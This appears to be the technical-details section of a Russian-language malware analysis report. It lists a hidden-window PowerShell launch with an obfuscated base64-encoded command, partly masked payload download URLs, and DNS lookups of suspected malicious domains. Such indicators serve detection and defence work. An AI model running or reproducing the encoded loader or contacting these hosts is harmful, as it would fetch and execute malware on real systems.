Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEUAUgBVAEMAdQB0AHYAPQAnAFgAQwBKAFEATwBqAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBJAFQAeQBwAHIATwBgAFQAbwBgAEMAYABvAGwAIgAgAD...
- http://ju####kongyt.com/crm/52p1_drac_sc9/
- http://ar###edia.pl/ca/al4_9dxus_dj5wer6/
- DNS ASK ju####kongyt.com
- DNS ASK je###alk.com
- DNS ASK cs####ldersllc.com
- DNS ASK bl##.#unarbe.org.br
- DNS ASK ar###edia.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEUAUgBVAEMAdQB0AHYAPQAnAFgAQwBKAFEATwBqAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBJAFQAeQBwAHIATwBgAFQAbwBgAEMAYABvAGwAIgAgAD...' (со скрытым окном)